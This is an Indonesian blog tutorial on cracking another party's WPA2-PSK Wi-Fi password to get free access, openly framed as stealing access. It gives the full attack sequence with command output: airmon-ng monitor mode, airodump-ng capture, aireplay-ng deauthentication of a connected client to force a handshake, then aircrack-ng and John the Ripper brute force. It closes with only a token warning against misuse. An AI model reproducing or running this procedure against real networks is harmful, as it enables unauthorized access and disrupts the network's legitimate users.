Wireless Hacking – Cracking WPA / PSK Key (WIFI)
Pasti
begitu banyak yang mendapatkan Hotspot Gratis, tapi juga ada yang menggunakan
Password! Sial klo sedang mau wireless’an eh di password. Nah berikut ini
adalah cara untuk melakukan Hacking / Cracking terhadap WPA / PSK yang di
password.
Oke,
yang diperlukan adalah:
1.
Anda menggunakan BackTrack 5 Linux sebagai OS Secondary anda, buatlah dual
booting di LAPTOP anda
2.
Anda harus mengumpulkan password worldlist, agar bisa dilihat passwordnya,
silakan dicari di google.
3.
Koneksi wireless / wireless card
4.
WPA yang ada di laptop anda.
5.
John the ripper password cracker.
6.
Aircrack-ng & airodump-ng (Aircrack package dah)
Download BackTrack 5 Disini:
Download Wordlist John The Ripper Disini:
Biasanya tools yang dibutuhkan diatas sudah lengkap ada di BackTrack, klo bukan BT ya silakan Install 
Oke mari kita lanjutkan:
1.
Kita buka shell prompt di BT dan tampilkan wireless yang sedang ada di sekitar
kita, berikut adalah perintahnya:
root@binushacker:~#
airmon-ng start wlan0
Interface
Chipset Driver
wlan0
Zydas zd1211 zd1211rw – [phy1]
(monitor mode enabled on mon0)
(monitor mode enabled on mon0)
2.
Khekhehehe.. Ternyata ada yang nongol, yuk mari kita jadikan target wireless
tersebut:
root@binushacker:~# airodump-ng mon0
BSSID
PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E
0 61 0 0 11 54e WPA2 CCMP PSK Wireless
3.
Wokeh, sudah tersedia, mari kita mulai mengambil / mencuri akses wireless
root@binushacker:~#
airodump-ng mon0 –channel 11 –bssid 38:E7:D8:AD:B2:0E -w /tmp/wpa2
CH
11 ][ BAT: 3 hours 51 mins ][ Elapsed: 7 mins ][ 2011-09-26 21:24
BSSID
PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E
0 100 4319 83 0 11 54e WPA2 CCMP PSK Wireless
BSSID
STATION PWR Rate Lost Packets Probes
38:E7:D8:AD:B2:0E
00:03:6D:F4:F8:86 0 1 -48 0 81 Wireless
Kita
tunggu user untuk melakukan autentikasi dan de-autentikasi selama beberapa
waktu.
Sabar saja ketika menunggu ya.. Pasti ada yang login & logout kan? Nah sampai ketemu hal seperti berikut dibawah:
Sabar saja ketika menunggu ya.. Pasti ada yang login & logout kan? Nah sampai ketemu hal seperti berikut dibawah:
4.
Kita mendapatkan user yang sedang logout / deautentikasi / kita buat dia
deautentikasi, kita gunakan perintah berikut:
root@binushacker:~# aireplay-ng -0 1 -a 38:E7:D8:AD:B2:0E -c 00:03:6D:F4:F8:86 mon0
21:25:49 Waiting for beacon frame (BSSID: 38:E7:D8:AD:B2:0E) on channel 11
21:25:50 Sending 64 directed DeAuth. STMAC: [00:03:6D:F4:F8:86] [62|63 ACKs]
root@binushacker:~#
5.
Setelah logout & user tesebut login lagi, maka kita akan mendapatkan
informasi key loginnya seperti hal berikut:
CH 11 ][ BAT: 3 hours 43 mins ][ Elapsed: 1 min ][ 2011-09-26 21:27 ][ WPA handshake: 38:E7:D8:AD:B2:0E
CH 11 ][ BAT: 3 hours 43 mins ][ Elapsed: 1 min ][ 2011-09-26 21:27 ][ WPA handshake: 38:E7:D8:AD:B2:0E
BSSID
PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E
0 96 807 28 0 11 54e WPA2 CCMP PSK Wireless
BSSID
STATION PWR Rate Lost Packets Probes
38:E7:D8:AD:B2:0E
00:03:6D:F4:F8:86 0 54 – 6 0 161
6.
Nah kita dapatkan nih autentikasinya, kita mulai dengan John The Ripper,
pastikan bahwa anda memiliki wordlist yang sangat banyak dan kompleks agar bisa
ketemu KEY nya:
root@binushacker:~# aircrack-ng -w /pentest/passwords/john/password.lst -b
38:E7:D8:AD:B2:0E /tmp/wpa*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...
Aircrack-ng
1.1 r1904
[00:00:00]
48 keys tested (489.60 k/s)
KEY
FOUND! [ W!R3L3$$PWD ]
Master
Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D
Transient
Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B
EAPOL
HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@binushacker:~#
root@binushacker:~#
Nah,
passwordnya ketemu: W!R3L3$$PWD
7.
Klo anda gak mau pake wordlist, ya biasanya menunggu agak lama, apalagi klo
komputernya lemot bisa berabe. Berikut adalah cara tanpa menggunakan wordlist
dengan John The Ripper:
root@binushacker:~# /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b 38:E7:D8:AD:B2:0E -w - /tmp/wpa2*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...
root@binushacker:~# /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b 38:E7:D8:AD:B2:0E -w - /tmp/wpa2*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...
Aircrack-ng
1.1 r1904
[00:00:22]
11484 keys tested (534.50 k/s)
KEY
FOUND! [ W!R3L3$$PWD ]
Master
Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D
Transient
Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B
EAPOL
HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@binushacker:~#
root@binushacker:~#
Nah,
passwordnya ketemu juga, tapi saya harus menunggu 30 JAM:
W!R3L3$$PWD
Ingat!!!
Jangan Disalah Gunakan
PERHATIAN !!!
BalasHapusTidak Diperbolehkan COPAS punya Orang lain
kalau Mau Copas IZIN Dulu
BalasHapus:v